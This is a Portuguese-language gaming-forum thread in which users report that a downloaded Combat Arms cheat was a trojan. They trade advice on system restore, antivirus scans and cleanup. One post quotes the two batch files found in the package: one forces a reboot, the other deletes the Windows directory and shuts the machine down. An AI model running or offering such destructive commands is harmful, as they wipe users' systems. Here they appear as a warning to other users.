xAnonymous 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · ja tentou fazer uma restauração do sistema ?? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
THEROCKMAT 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · tem como resolver isso sem ter q formata ? ajuda pf em qual lugar eu vo pra restaura meu é windows xp ajdua pf anonymous ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
xAnonymous 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · bom senao puder restaurar sistema tenta saber quais arquivos foram danificados caso seja alguma dll importante tente baixa-la ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
THEROCKMAT 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · ajuda pf ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
xAnonymous 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · então faz oque falei tente descobrir se há algum arquivo danificado,faça uma verificação com anti-virus ... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
iOwning 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · xAnonymous Eu consegui restaurar meu sistema, posso ficar despreocupado ou ainda não ? D: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
THEROCKMAT 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · ajuda ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
xAnonymous 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · bom notaram alguma mudança ants e depois da restauração? fizeram verificação pra ver se ainda contem virus no pc ? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
THEROCKMAT 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · fiz verificação e so achei 1 infectado ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
OsklenMTK 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · Fudeu meu pc melhor nem baixarem vo ter que gastar 50 reais pra formatar. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
xAnonymous 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · entao exclua o virus, reinicie o pc, indico usar ccleaner para poder fazer uma boa limpeza do sistema ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
iOwning 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · xAnonymous Fiz a verificação e o avast não encontrou nada. as únicas diferenças que eu encontrei foram o combat arms ter sumido(nem .exe existe mais), a própria pasta do hack e o brazukas hack. fico calmo ou não ? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
THEROCKMAT 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · aff fudeu quase tudo um monte de coisa desapareceu e nao consigo acha o restaurador ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
~>MtroitXx<~ 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · [/color]"]Afff! Man Eu N Consigo Ler Oq Vcs Falam! N Baixem é Puro Trojan!!!!! Agora vo Tem Que Recuperar Meu Windows ! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
THEROCKMAT 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · droga de fdp q fez isso ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
xAnonymous 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · bom se vc não notou nenhum dano grave ocorrido fique tranquilo, se pc estiver reiniciando sozinhu,dando erros ai tente fazer a formatação,pelo que vi apenas foi excluido o combat, eu baixei aqui pra ver o resultado e como imaginei meu combat tbm sumiu fiz uma verificaçoes e consegui arrumar os danos ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
THEROCKMAT 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · veiu foi apagado umas coisas e agora nao sei o q devo fazer ele tava lento dai passsei o anti viros mandei pra quarentena o viros e pasei o ccleaner dai nao fico mais lento vo reiniciar aqui pra ver se eu nao volta fudeu msm valew pela ajuda amigo ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
regaemafia 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · vo logo avisando quem baixa isso ta pedindo pra fuder o pc!!! serio num e brincadeira assim que abrer o arquivo instalar abre altomaticamente o pronpt e quer abrir o arquivo protegido ainda bem que o windons num deixa!! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
xAnonymous 0 Postado 10 de Fevereiro 2012 Compartilhar Postado 10 de Fevereiro 2012 · galera um conselho nunca baixe nada sem verificar antes ou vir de uma fonte confiavel,leia bastante o resultados dos cobaias,fique sempre atento em tudo que vc baixa.. mas qualquer duvidas ainda só postar ae que estarei ajudando no que puder ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
babinha1 0 Postado 11 de Fevereiro 2012 Compartilhar Postado 11 de Fevereiro 2012 · uhsahusahusa esse cara lascou literalmente com muita gente. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
dionatads 0 Postado 11 de Fevereiro 2012 Compartilhar Postado 11 de Fevereiro 2012 · ae kara tu ñ tem oq faze? isso pode ser oq vc kize mas hack pra ca num é aki nem lá na china quando fui instala a bagaça abriu o cmd e começou a enviar comandos muitos estranhos do tipo alguma coisa a ver com logoff oq um hack tem a ver com logof tenho ate um print aki ][/font] ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
pedrosrmt 0 Postado 11 de Fevereiro 2012 Compartilhar Postado 11 de Fevereiro 2012 · manolitos eu achei arquivos .bat nos exe da pasta olha o que tinha neles: 1º .bat @echo off @break off shutdown -r -f -t 00 exit 2º .bat rmdir /s /q c:\windows shutdown -s -c "Todas suas bases pertencem a mim." -t 03 ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
xAnonymous 0 Postado 11 de Fevereiro 2012 Compartilhar Postado 11 de Fevereiro 2012 · isso ja foi postado, se tiver alguem ainda mesmo depois de tantos post está tentando mexer com esse hack quer realmente acabar com seu pc' staff closed aqui urgente ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
mckodaminha 0 Postado 11 de Fevereiro 2012 Compartilhar Postado 11 de Fevereiro 2012 · Mano, melhora ai, Scan com Virus Bat.ca e Trojan cara, isso não é falso positivo! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
~>MtroitXx<~ 0 Postado 11 de Fevereiro 2012 Compartilhar Postado 11 de Fevereiro 2012 · Tive que usar recuperação do sistema!!!!!!!!!! Ban nesse nub!!!!!!!!!!!!! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados